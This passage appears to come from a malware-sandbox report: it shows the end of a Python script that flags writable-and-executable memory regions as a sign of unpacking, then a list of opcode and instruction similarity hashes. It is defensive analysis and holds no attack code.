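    "00000000.00000002.1413108358.0000000001469000.00000040.00000001.01000000.00000003.sdmp",
    "00000000.00000002.1414057526.000000000146C000.00000004.00000001.01000000.00000003.sdmp",
    "00000000.00000002.1414076607.000000000146E000.00000040.00000001.01000000.00000003.sdmp",
    "00000000.00000002.1414076607.00000000015F6000.00000040.00000001.01000000.00000003.sdmp",
    "00000000.00000002.1414076607.000000000170A000.00000040.00000001.01000000.00000003.sdmp",
    "00000000.00000002.1414076607.000000000170D000.00000040.00000001.01000000.00000003.sdmp",
    "00000000.00000002.1414076607.00000000017ED000.00000040.00000001.01000000.00000003.sdmp",
    "00000000.00000002.1414076607.00000000017F7000.00000040.00000001.01000000.00000003.sdmp",
    "00000000.00000002.1414076607.0000000001805000.00000040.00000001.01000000.00000003.sdmp",
    "00000000.00000002.1414465145.0000000001806000.00000080.00000001.01000000.00000003.sdmp",
    "00000000.00000002.1414688021.00000000019C0000.00000040.00000001.01000000.00000003.sdmp",
    "00000000.00000002.1414707318.00000000019C2000.00000080.00000001.01000000.00000003.sdmp",
]

if __name__ == "__main__":
    for off, prot in wx_image_regions(SAMPLE_DUMPS, IMAGE_BASE):
        print(f"RVA 0x{off:06x}: {prot}")
```

Run as-is it lists every image region that is writable and executable; only the two PAGE_READWRITE dumps (the header page at the image base and 0x146C000) are left out. In a clean, unpacked PE, code sections are mapped PAGE_EXECUTE_READ and data sections PAGE_READWRITE, so a run of PAGE_EXECUTE_READWRITE image pages starting at RVA 0x1000 is itself evidence of self-modifying or unpacking code, independent of any signature name.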
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: ca317dcc8acce03ba18059c2ddd3d15a66ba3602f8d43973b672324825c6a580
• Instruction ID: 2e582f51a6fe90a12c36759851176afee4f300482ab69db60ac04ca8ae231a56
• Opcode Fuzzy Hash: ca317dcc8acce03ba18059c2ddd3d15a66ba3602f8d43973b672324825c6a580
• Instruction Fuzzy Hash: 56C13D716056018FD3698F2AC498669FFE1FF81310F1986ADD5EA8F792C734E885CB84
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: e255173aa0bdf92621763e4c8bce104da3c96345eb545cdbf26f76a03c2a3c30
• Instruction ID: 6cfa034becfcaf60246a41585ccb27a17958cc85041195d5ce83d71c560c4319
• Opcode Fuzzy Hash: e255173aa0bdf92621763e4c8bce104da3c96345eb545cdbf26f76a03c2a3c30
• Instruction Fuzzy Hash: 95A115716483214FC724CF2CD48062BB7E2AFC5394F19962EE595A7392EB35DC468B81
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 683224067c027944c6ca69fdbb718edbc9ffe4db7d7567d4de4577e7526fedca
• Instruction ID: a98cce258cfc304ad2d4664cbb55c4ab15e6614351dc3ed95be4f22c0c99052a
• Opcode Fuzzy Hash: 683224067c027944c6ca69fdbb718edbc9ffe4db7d7567d4de4577e7526fedca
• Instruction Fuzzy Hash: EDA1A535A002598FEB38DE25CC51FDA73E2EF88314F1A8525DD59AF3D5EA30AD498780
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 461de2028e2d67065d228e60890f4b27dcaaa4ea86806436ffbda62a5cc9bdca
• Instruction ID: 305e53d49db805a8140c395ccd902cb92123e56333cbc5cbf3ad9dc98d0da087
• Opcode Fuzzy Hash: 461de2028e2d67065d228e60890f4b27dcaaa4ea86806436ffbda62a5cc9bdca
• Instruction Fuzzy Hash: D8C1D771914B419BD321CF38C891BE6F7E1BF99304F209E1DE9EA66241EB707584CB51
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: d67a76076b25847bfa45f031f6b62ccd2db48ba29eb8355a08d70dc9e0452797
• Instruction ID: 2c9ec3640b75af207213b405535a8da9aa2b6489f63bbd9c7c7cd23aa77730e2
• Opcode Fuzzy Hash: d67a76076b25847bfa45f031f6b62ccd2db48ba29eb8355a08d70dc9e0452797
• Instruction Fuzzy Hash: 76712B3260C2610AEF5E496C5890279EBD74BC3620F9E463AE4E9C778ED735C8438393
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 6f995c7914a0ad0a07d991182d04c6b66e6b2cb03fc917ae770809f0a9359eb5
• Instruction ID: 5692f5f77ca4704f8ee9c8e8f0f973ea284da6c64ef57ba9867f808925582898
• Opcode Fuzzy Hash: 6f995c7914a0ad0a07d991182d04c6b66e6b2cb03fc917ae770809f0a9359eb5
• Instruction Fuzzy Hash: DB81C561D0D78497E6219B359E417ABB3E4AFE9304F099B28BD8CA1013FB30B9D49342
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 574912ca784cfb7a54c497942ef8a308bfafd0ad38eaca6e05dc24ec470db8dc
• Instruction ID: b09701c7cec907edcebe6e3c75ea27d8f96774816c6e288cb38f018b5bd182f7
• Opcode Fuzzy Hash: 574912ca784cfb7a54c497942ef8a308bfafd0ad38eaca6e05dc24ec470db8dc
• Instruction Fuzzy Hash: 97711232A08715CFCB109F19C89436AB7E1EFC9328F59876DE9E84B395D334E9508B81
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 615d368d8055732dcb7a1a09a0c38f4a38c8b8aa31824430772460d3ed2b3235
                                                              • Instruction ID: fc57444f1f53dadf2cbd5612da0618355a4acc3af8ab81dc2b346003d0b24490
                                                              • Opcode Fuzzy Hash: 615d368d8055732dcb7a1a09a0c38f4a38c8b8aa31824430772460d3ed2b3235
                                                              • Instruction Fuzzy Hash: 72811A72D18B828BD3119F68C8916B6BBE0FFDA314F14475EEAD60AB83E7749181C741
                                                              Strings
                                                              Similarity
                                                              • API ID:
                                                              • String ID: [
                                                              • API String ID: 0-784033777